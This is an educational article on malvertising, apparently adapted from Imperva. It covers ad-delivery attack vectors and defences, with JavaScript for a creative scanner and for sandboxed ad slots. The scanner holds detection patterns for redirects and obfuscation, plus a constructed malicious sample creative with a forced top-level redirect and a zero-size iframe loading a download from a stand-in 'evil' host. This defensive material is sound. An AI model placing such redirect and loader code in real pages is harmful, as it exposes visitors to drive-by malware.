What You Will Learn
- 1 What is malvertising
- 2 Malvertising vs. Ad malware
- 3 How malvertisements affect web users
- 4 How malvertisements affect publishers
- 5 Examples: How malware is inserted into ads
- 6 Prevention and mitigation of malvertising
What is malvertising
Malvertising is an attack in which perpetrators inject malicious code into legitimate online advertising networks. The code typically redirects users to malicious websites.
The attack allows perpetrators to target users on highly reputable websites, e.g., The New York Times Online, The London Stock Exchange, Spotify and The Atlantic, all of which have been exposed to malvertising.
The online advertising ecosystem is a complex network that involves publisher sites, ad exchanges, ad servers, retargeting networks and content delivery networks (CDNs). Multiple redirections between different servers occur both when an ad is loaded into the page and again after a user clicks on it. Attackers exploit this complexity to place malicious content in places that publishers and ad networks would least expect, often several hops away from anything the publisher can see.
Malvertising vs. Ad malware
Malvertising is often confused with ad malware or adware, another form of malware affecting online advertisements.
Adware is a program running on a user's computer. It is usually packaged with other, legitimate software, or is installed without the user's knowledge. Adware displays unwanted advertising, redirects search requests to advertising websites, and collects data about the user to help target or serve advertisements.
Differences between malvertising and ad malware include:
- Malvertising involves malicious code that is delivered through a publisher's web page, inside the ad slot; nothing needs to be installed on the victim's machine beforehand. Adware is a program installed on an individual user's device.
- Malvertising only affects users while they view (or click) an infected web page. Adware, once installed, operates continuously on the user's computer.
How malvertisements affect web users
Malvertising might perform the following attacks on users viewing the malvertisement without clicking it:
- A "drive-by download", the installation of malware or adware on the computer of a user merely viewing the ad. This type of attack is usually made possible by vulnerabilities in the browser or its plugins.
- Forced redirect of the browser to a malicious site.
Malvertising can do the following when users actually click a malicious ad:
- Execute code that installs malware or adware on the user’s computer
- Redirect the user to a malicious website, instead of the target suggested by the ad’s content
- Redirect the user to a malicious website that closely imitates a real site and is operated by the attacker (a phishing attack)
How malvertisements affect publishers
The threat to publishers is damaged reputation, loss of traffic and revenue, and legal liability for damages caused to users visiting their sites.
While publishers are aware of the problem, they find it difficult to test for or block malicious ads. Ad networks serve ads from millions of advertisers and select them dynamically through real-time bidding, so the creative a given visitor sees is chosen and assembled in milliseconds by third parties. This makes it very difficult to test all the ads that are actually shown to users.
Examples: How malware is inserted into ads
Attackers use several delivery mechanisms to insert malicious code into ads:
- Malware in ad calls — when a website displays a page that contains an ad, the user's browser fetches the ad through a chain of third-party servers (exchange, ad servers, CDNs). If any one of these servers is compromised, the attacker can add malicious code to the ad payload before it reaches the browser.
- Malware injected post-click — when the user clicks on an ad, they are typically redirected between several URLs, ending with the ad landing page. If an attacker compromises any of the URLs along this delivery path, they can execute malicious code.
- Malware within a pixel — pixels are small resources embedded in an ad call or landing page, which send data to a server for tracking purposes. A legitimate pixel only sends data and returns an empty image. If an attacker controls or intercepts a pixel's delivery path, the response can instead carry a redirect or, where the pixel is implemented as a script tag, executable code that runs in the user's browser.
- Malware within video — video ad players load whatever the ad response tells them to, without inspecting it. VAST (the IAB Video Ad Serving Template) is an XML format for video ad responses; a VAST response references third-party tracking pixels and can load interactive units (VPAID) that may contain malicious code. A video can also send users to a malicious URL through its clickthrough link or an end card shown when playback finishes.
- Malware within Flash video — videos based on Flash could inject an iframe into the page, which downloaded malware without the user clicking on the video. Flash files could also load a pre-roll banner (a static image shown while the file was loading), and attackers injected malicious code into the pre-roll banner so that it ran without any click. Flash reached end of life at the end of 2020 and current browsers no longer run it, so this vector is now historical.
- Malware on a landing page — even on legitimate landing pages served by reputable websites, there may be clickable elements that execute malicious code. This type of malware is particularly dangerous because users click an ad, land on a real, legitimate landing page, but are infected by a malicious on-page element.
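The delivery mechanisms above share a pattern: a third-party host that nobody vetted, plus a construct (forced top-level redirect, hidden iframe, runtime-decoded script) that a legitimate display or VAST creative has no reason to contain. The following static scanner, added here as an example and not part of Imperva's product or the original article, pulls every URL out of an HTML creative or VAST response, compares the hostnames against a publisher allowlist, and flags those constructs. The allowlist hosts, the `*.example` domains and the three sample creatives are constructed for the example.

```javascript
'use strict';

// Hosts the publisher has vetted. Hypothetical allowlist for this example.
const TRUSTED_HOSTS = new Set([
  'ads.example-exchange.com',
  'cdn.example-creative.com',
  'track.example-pixel.com',
]);

// Constructs a display creative has no legitimate reason to contain.
const RISKY_PATTERNS = [
  // Assigning top/parent location from inside the ad frame = forced redirect.
  { id: 'forced-redirect', re: /\b(?:window\.|self\.)?(?:top|parent)\.location\b/ },
  // Meta refresh redirects the page even with scripting disabled.
  { id: 'meta-refresh', re: /<meta[^>]+http-equiv\s*=\s*["']?refresh/i },
  // Zero-size or invisible iframes are the classic drive-by loader.
  { id: 'hidden-iframe', re: /<iframe[^>]*(?:width\s*=\s*["']?0\b|height\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden)/i },
  // Runtime-decoded script is how payloads evade static scanners.
  { id: 'obfuscation', re: /\b(?:eval|unescape|String\.fromCharCode)\s*\(/ },
];

// Every absolute http(s) URL in the creative: attribute values, VAST CDATA
// bodies, and string literals inside inline scripts all match this.
function extractUrls(creative) {
  return [...new Set(creative.match(/https?:\/\/[^"'\s<>\]\)]+/g) || [])];
}

// Returns a list of findings; an empty list means nothing suspicious.
function scanCreative(creative, trusted = TRUSTED_HOSTS) {
  const findings = [];
  const hosts = new Set();
  for (const url of extractUrls(creative)) {
    try {
      hosts.add(new URL(url).hostname);
    } catch (e) {
      findings.push({ id: 'malformed-url', detail: url });
    }
  }
  for (const host of hosts) {
    if (!trusted.has(host)) findings.push({ id: 'untrusted-host', detail: host });
  }
  for (const { id, re } of RISKY_PATTERNS) {
    const m = creative.match(re);
    if (m) findings.push({ id, detail: m[0].slice(0, 60) });
  }
  return findings;
}

// Constructed sample creatives. A clean banner with a vetted tracking pixel:
const BENIGN_CREATIVE = `<a href="https://ads.example-exchange.com/click?id=123">
<img src="https://cdn.example-creative.com/banner.png" width="300" height="250"></a>
<img src="https://track.example-pixel.com/imp?id=123" width="1" height="1">`;

// The same banner with a forced redirect and a zero-size loader frame added:
const MALICIOUS_CREATIVE = `<img src="https://cdn.example-creative.com/banner.png">
<script>if(window.top!==window.self){window.top.location="https://evil-landing.example/"}</script>
<iframe src="https://evil-landing.example/dl" width="0" height="0"></iframe>`;

// A VAST response whose second impression pixel points at an unvetted vendor:
const VAST_RESPONSE = `<VAST version="3.0"><Ad id="1"><InLine>
<Impression><![CDATA[https://track.example-pixel.com/imp?ad=1]]></Impression>
<Impression><![CDATA[https://pixel.unknown-vendor.example/i.gif]]></Impression>
<Creatives><Creative><Linear><MediaFiles>
<MediaFile type="video/mp4"><![CDATA[https://cdn.example-creative.com/spot.mp4]]></MediaFile>
</MediaFiles></Linear></Creative></Creatives></InLine></Ad></VAST>`;

console.log(JSON.stringify({
  benign: scanCreative(BENIGN_CREATIVE),
  malicious: scanCreative(MALICIOUS_CREATIVE),
  vast: scanCreative(VAST_RESPONSE),
}, null, 2));
```

A static pass like this catches only what is present in the creative at scan time. Malvertising payloads are frequently cloaked (served only to certain geographies, user agents or times of day) and fetched through further redirects, so a production scanner also renders each creative in a headless browser from several vantage points and records every host touched along the chain.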
Prevention and mitigation of malvertising
Malvertising is an attack which is difficult to detect and mitigate, and requires action by end users and publishers alike.
How can end-users help mitigate malvertising?
- Antivirus software can protect against some drive-by downloads or malicious code executed by malvertising.
- Ad blockers offer strong protection against malvertising, because they block the ads altogether, including any malicious elements they carry.
- Disabling or removing the Flash and Java browser plugins eliminates many of the vulnerabilities that malvertising historically exploited; current browsers no longer run these plugins at all.
- Keeping the browser, its extensions and any remaining plugins up to date can prevent many malvertising attacks, in particular those that run before the user clicks the ad.
How can publishers help mitigate malvertising?
- Carefully vet ad networks and inquire about ad delivery paths and security practices.
- Scan ad creative intended for display to discover malware or unwanted code.
- Imperva's Web Application Firewall (WAF) can help protect against some malvertising threats by using signature, behavioral and reputation analysis to block malicious code execution and requests arriving from non-trusted sources along the ad delivery chain.
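Vetting networks and scanning creatives reduce how often a bad ad reaches the page; the publisher can also limit what a bad ad can do once it is there. The example below, added here and not part of Imperva's product or the original article, contrasts the weak way of placing an ad tag (a script injected straight into the publisher page, running with the publisher's origin) with a cross-origin iframe whose `sandbox` attribute omits the two flags malvertising relies on, `allow-top-navigation` (forced redirects) and `allow-same-origin` (access to the publisher's DOM and cookies), plus a Content-Security-Policy that lets only vetted hosts be framed or scripted. The host names are hypothetical.

```javascript
'use strict';

// Sandbox flags an ad frame needs in order to work: run its script, open the
// landing page in a new tab on click, and let that new tab leave the sandbox.
// Deliberately absent: allow-same-origin and allow-top-navigation.
const AD_SANDBOX = ['allow-scripts', 'allow-popups', 'allow-popups-to-escape-sandbox', 'allow-forms'];

// Flags that hand the creative exactly the capabilities malvertising abuses.
// 'allow-top-navigation-by-user-activation' is the acceptable compromise when
// the ad tech insists on same-tab clickthrough: navigation then needs a click.
const DANGEROUS_SANDBOX_FLAGS = new Set(['allow-same-origin', 'allow-top-navigation']);

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value).replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;');
}

// Weak form: third-party code executes in the publisher's own origin, so it
// can rewrite the page, read cookies and set top.location at will.
function weakAdSlot(tagUrl) {
  return `<div class="ad"><script src="${escapeAttr(tagUrl)}"></script></div>`;
}

// Hardened form: the creative renders in a sandboxed, cross-origin iframe.
// Inside it, an assignment to top.location is refused by the browser.
function hardenedAdSlot(tagUrl, { width = 300, height = 250 } = {}) {
  const sandbox = AD_SANDBOX.join(' ');
  return `<iframe src="${escapeAttr(tagUrl)}" width="${width}" height="${height}" ` +
    `sandbox="${sandbox}" referrerpolicy="strict-origin" loading="lazy"></iframe>`;
}

// Lint a sandbox attribute value: returns the dangerous flags it grants.
function sandboxViolations(sandboxValue) {
  return sandboxValue.trim().split(/\s+/).filter((f) => DANGEROUS_SANDBOX_FLAGS.has(f));
}

// Content-Security-Policy header value for the publisher page: only the vetted
// ad hosts may be framed, scripted, or contacted. Note this governs the
// publisher document; what the framed creative loads is governed by the CSP
// of the ad server's own response, which is why vetting that server matters.
function adCsp(trustedHosts) {
  const hosts = trustedHosts.join(' ');
  return [
    "default-src 'self'",
    `script-src 'self' ${hosts}`,
    `frame-src ${hosts}`,
    `img-src 'self' data: ${hosts}`,
    `connect-src 'self' ${hosts}`,
  ].join('; ');
}

// Hypothetical vetted ad host.
const AD_TAG = 'https://ads.example-exchange.com/slot?id=1';
console.log(weakAdSlot(AD_TAG));
console.log(hardenedAdSlot(AD_TAG));
console.log('Content-Security-Policy:', adCsp(['https://ads.example-exchange.com']));
console.log('violations in a permissive sandbox:',
  sandboxViolations('allow-scripts allow-same-origin allow-top-navigation'));
```

The sandbox blocks the pre-click forced redirect and the drive-by iframe's access to the publisher origin; it does not stop a malicious landing page after a genuine click, which is where creative scanning and reputation filtering still apply.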